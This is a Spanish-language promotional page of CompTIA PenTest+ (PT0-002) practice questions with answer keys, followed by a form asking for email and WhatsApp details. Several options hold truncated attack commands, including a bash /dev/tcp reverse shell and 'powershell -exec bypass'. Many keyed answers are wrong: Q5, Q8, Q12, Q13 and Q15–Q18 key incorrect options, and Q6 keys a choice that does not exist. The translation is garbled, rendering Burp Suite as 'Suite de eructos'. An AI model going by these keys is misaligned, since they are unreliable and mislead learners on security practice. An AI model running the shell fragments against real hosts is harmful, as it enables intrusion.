¿NO QUIERES PERDERTE NADA?

Consejos para aprobar el examen de certificación

Últimas noticias sobre exámenes e información sobre descuentos.

Curado y actualizado por nuestros expertos.

Sí, envíame el boletín.

Mejore su preparación para la certificación con los simulacros de examen CompTIA PT0-002, certificación CompTIA PenTest+ | SPOTO

Mejore su preparación para la certificación CompTIA PenTest+ (PT0-002) con nuestros simulacros de examen especializados CompTIA PT0-002. Practique las preguntas de examen más recientes para impulsar su preparación para la certificación de manera eficaz. Nuestros completos materiales de estudio incluyen pruebas de práctica, preguntas de muestra, volcados de examen y preguntas y respuestas de examen para garantizar una preparación exhaustiva. La certificación CompTIA PenTest+ está diseñada específicamente para profesionales de ciberseguridad a quienes se les confían responsabilidades de pruebas de penetración y administración de vulnerabilidades. Utilice nuestros exámenes de prueba y simulador de examen para una experiencia de examen realista, mejorando su confianza y preparación. Acceda a nuestros materiales y respuestas de examen para reforzar su comprensión y dominio de los conceptos clave. Con nuestros recursos de preparación de examen y pruebas simuladas, estará bien equipado para tener éxito en su examen PT0-002 y obtener su certificación CompTIA PenTest+.
Realizar otros exámenes en línea

Cuestionar #1
Un probador de penetración que está realizando un compromiso se da cuenta de que un host específico es vulnerable a EternalBlue. Cuál de las siguientes opciones sería la MEJOR protección contra esta vulnerabilidad?
A. Segmentación de la red
B. Rotación de llaves
C. Contraseñas cifradas
D. Gestión de parches
Ver respuesta
Respuesta correcta: D
Cuestionar #2
Un evaluador de penetración está revisando el siguiente SOW antes de comprometerse con un cliente: "Los diagramas de red, el inventario de activos lógicos y físicos y los nombres de los empleados se tratarán como confidenciales del cliente. Una vez finalizado el contrato, el evaluador de intrusiones enviará los resultados al Director de Seguridad de la Información (CISO) del cliente a través de protocolos cifrados y, posteriormente, eliminará todos los resultados borrándolos de forma segura" Basándose en la información del SOW, ¿cuál de los siguientes comportamientos
A. Utilizar herramientas propias de pruebas de penetración que no estén a disposición del público o del cliente para su auditoría e inspección
B. Utilizar criptografía de clave pública para garantizar que los resultados se entregan al CISO una vez finalizado el compromiso
C. No compartir con el cliente las vulnerabilidades críticas que existen en la arquitectura del cliente para apaciguar al equipo directivo del cliente
D. Buscar ayuda con el compromiso en foros clandestinos de hackers compartiendo la dirección IP pública del cliente
E. Utilizar una herramienta de borrado basada en software para borrar los hallazgos del cliente del ordenador portátil del probador de penetración
F. Conservar el SOW dentro de la empresa del probador de penetración para su uso futuro, de modo que el equipo de ventas pueda planificar futuros compromisos
Ver respuesta
Respuesta correcta: A
Cuestionar #3
Un probador de penetración ejecutó el siguiente comando en un servidor de ensayo: python -m SimpleHTTPServer 9891 ¿Cuál de los siguientes comandos podría utilizarse para descargar un archivo llamado exploit a una máquina de destino para su ejecución?
A. nc 10
B. powershell -exec bypass -f \\10
C. bash -i >& /dev/tcp/10
D. wget 10
Ver respuesta
Respuesta correcta: B
Cuestionar #4
¿Cuál de las siguientes opciones describe MEJOR el Top 10 de OWASP? (Elija dos.)
A. Los riesgos más críticos de las aplicaciones web
B. Una lista de todos los riesgos de las aplicaciones web
C. Los riesgos definidos por orden de importancia
D. Un estándar de seguridad para aplicaciones web
E. Un marco de gestión de riesgos y cumplimiento
F. Lista de vulnerabilidades de Apache
Ver respuesta
Respuesta correcta: C
Cuestionar #5
¿Cuál de los siguientes tipos de información debe incluirse al redactar la sección de reparación de un informe de prueba de penetración para que lo vean el administrador de sistemas y el personal técnico?
A. Una descripción rápida de la vulnerabilidad y un control de alto nivel para solucionarla
B. Información sobre el impacto en la empresa en caso de verse comprometida
C. El resumen ejecutivo y la información relativa a la empresa de ensayos
D. Las reglas del juego de la evaluación
Ver respuesta
Respuesta correcta: D
Cuestionar #6
Usted es un analista de seguridad encargado de reforzar un servidor web. Se le ha proporcionado una lista de cargas útiles HTTP marcadas como maliciosas. INSTRUCCIONES Dadas las siguientes firmas de ataque, determine el tipo de ataque, y luego identifique la remediación asociada para prevenir el ataque en el futuro. Si en algún momento desea volver al estado inicial de la simulación, haga clic en el botón Restablecer todo.
A. Masterizado
B. No dominado
Ver respuesta
Respuesta correcta: C
Cuestionar #7
Después de ejecutar el comando enum4linux.pl, una persona encargada de realizar pruebas de intrusión recibió la siguiente salida: ¿Cuál de los siguientes comandos debería ejecutar el probador de penetración SIGUIENTE?
A. smbspool //192
B. net rpc share -S 192
C. smbget //192
D. smbclient //192
Ver respuesta
Respuesta correcta: D
Cuestionar #8
Un probador de penetración completó un escaneo de vulnerabilidad contra un servidor web e identificó una única pero severa vulnerabilidad. Cuál de las siguientes es la MEJOR manera de asegurarse de que se trata de un verdadero positivo?
A. Ejecute otro escáner para comparar
B. Realice una prueba manual en el servidor
C. Compruebe los resultados en el escáner
D. Busque la vulnerabilidad en Internet
Ver respuesta
Respuesta correcta: D
Cuestionar #9
Una empresa de investigación privada solicita una prueba de penetración para determinar la probabilidad de que los atacantes puedan acceder a dispositivos móviles y, a continuación, extraer datos de dichos dispositivos. Cuál de los siguientes es un método de ingeniería social que, de tener éxito, permitiría con MAYOR probabilidad ambos objetivos?
A. Enviar un SMS con un número de servicio falsificado que incluya un enlace para descargar una aplicación maliciosA
B. Explotar una vulnerabilidad en el MDM y crear una nueva cuenta y perfil de dispositivo
C. Realizar vishing en el servicio de asistencia de TI para recopilar una lista de IMEI de dispositivos aprobados para la suplantación de identidad
D. Infestar un sitio web que es usado frecuentemente por empleados con malware dirigido a arquitecturas x86
Ver respuesta
Respuesta correcta: B
Cuestionar #10
Una empresa contrató a un equipo de pruebas de penetración para revisar los sistemas ciberfísicos de una planta de fabricación. El equipo descubrió inmediatamente que los sistemas de supervisión y los PLC están conectados a la intranet de la empresa. ¿Cuál de las siguientes suposiciones, si las hace el equipo de pruebas de penetración, es MÁS probable que sea válida?
A. Los PLCs no actuarán sobre comandos inyectados a través de la red
B. Los supervisores y controladores están en una red virtual separada por defecto
C. Los controladores no validarán el origen de los comandos
D. Los sistemas de supervisión detectarán una inyección maliciosa de código/comandos
Ver respuesta
Respuesta correcta: C
Cuestionar #11
Un probador de penetración está llevando a cabo un compromiso contra una aplicación web orientada a Internet y planificando una campaña de phishing. ¿Cuál de los siguientes es el MEJOR método pasivo para obtener los contactos técnicos del sitio web?
A. Búsqueda de dominios WHOIS
B. Anuncios de empleo y contratación
C. Información del certificado SSL
D. Vertederos públicos de filtraciones de datos
Ver respuesta
Respuesta correcta: C
Cuestionar #12
Un probador de penetración fue capaz de reunir hashes MD5 de un servidor y crackear los hashes fácilmente con tablas rainbow. Cuál de las siguientes opciones debería incluirse como recomendación en el informe de corrección?
A. Requisitos algorítmicos más estrictos
B. Controles de acceso al servidor
C. Cifrado de las contraseñas de los usuarios
D. Un programa de gestión de parches
Ver respuesta
Respuesta correcta: D
Cuestionar #13
Se ha contratado a un probador de penetración para examinar un sitio web en busca de fallos. Durante una de las franjas horarias de la prueba, un ingeniero de redes observa una avalancha de peticiones GET al servidor web, lo que reduce el tiempo de respuesta del sitio web en un 80%. El ingeniero de redes se pone en contacto con el probador de penetración para determinar si estas peticiones GET forman parte de la prueba. ¿Cuál de las siguientes opciones describe MEJOR el propósito de la comprobación con el probador de penetración?
A. Conocimiento de la situación
B. Reprogramación
C. Defensa DDoS
D. Desconflicción
Ver respuesta
Respuesta correcta: B
Cuestionar #14
¿Cuál de las siguientes herramientas sería la MÁS adecuada para realizar una evaluación manual de la seguridad de una aplicación web? (Elija dos.)
A. OWASP ZAP
B. Nmap
C. Nessus
D. BeEF
E. Hydra
F. Suite de eructos
Ver respuesta
Respuesta correcta: AF
Cuestionar #15
Un equipo rojo obtuvo acceso a la red interna de un cliente durante un compromiso y utilizó la herramienta Responder para capturar datos importantes. ¿Cuál de los siguientes fue capturado por el equipo de pruebas?
A. Apretones de manos múltiples
B. Direcciones IP
C. Transferencia cifrada de archivos
D. Hashes de usuario enviados por SMB
Ver respuesta
Respuesta correcta: C
Cuestionar #16
La realización de una prueba de penetración contra un entorno con dispositivos SCADA conlleva un riesgo de seguridad adicional porque el:
A. los dispositivos producen más calor y consumen más energíA
B. los dispositivos están obsoletos y ya no se pueden sustituir
C. los protocolos son más difíciles de entender
D. los dispositivos pueden causar efectos en el mundo físico
Ver respuesta
Respuesta correcta: B
Cuestionar #17
Un probador de penetración realizará un escaneo de vulnerabilidades como parte de la prueba de penetración en el sitio web de un cliente. El evaluador planea ejecutar varios scripts de Nmap que buscan vulnerabilidades y evitan la detección. ¿Cuál de las siguientes opciones de Nmap utilizará con MAYOR probabilidad?
A. -8 -T0
B. --script "http*vuln*"
C. -sn
D. -O -A
Ver respuesta
Respuesta correcta: C
Cuestionar #18
¿Cuál de las siguientes es la información MÁS importante que debe figurar en un informe de pruebas de penetración que se redacta para los desarrolladores?
A. Resumen ejecutivo
B. Remediación
C. Metodología
D. Métricas y medidas
Ver respuesta
Respuesta correcta: A

Ver respuestas después del envío

Envíe su correo electrónico y WhatsApp para obtener las respuestas a sus preguntas.

Nota: asegúrese de que su ID de correo electrónico y Whatsapp sean válidos para que pueda obtener los resultados correctos del examen.

Correo electrónico:
WhatsApp/número de teléfono: